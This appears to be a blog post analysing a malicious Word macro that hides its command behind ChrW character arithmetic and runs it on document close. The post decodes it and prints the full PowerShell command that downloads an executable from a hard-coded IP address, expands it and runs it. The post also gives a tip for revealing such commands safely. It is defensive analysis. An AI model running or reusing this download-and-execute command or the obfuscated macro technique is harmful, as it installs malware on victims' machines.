I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.
Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variables names, a bunch of calls to chrw, and one call to Shell.
chrw returns the character associated with the numeric character code.
Shell runs the command line code that is passed to it.
How does it work? When it creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.
Then it declares 6 variables ( GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip )and in each variable it's appending 1 character at a time the malicious shell script it wants to run.
As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.
ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)
How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the Ascii Table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the Ascii Table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the Ascii Table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the Ascii Table is the letter ' '
So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that.
Or just open a new word document, copy this code in, but replace the malicious Shell line
IUGuyguisdf = Shell(JHGUgisdc, 0)
with a message box
MsgBox(JHGUgisdc)
Happy hunting.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
This is good for Digital Forensic Analysts. Nice piece.
ReplyDeleteGlad I could help!
DeleteThis is my first time i visit here and I found so many interesting stuff in your blog especially it's discussion, thank you.
ReplyDeleteexcel vba courses london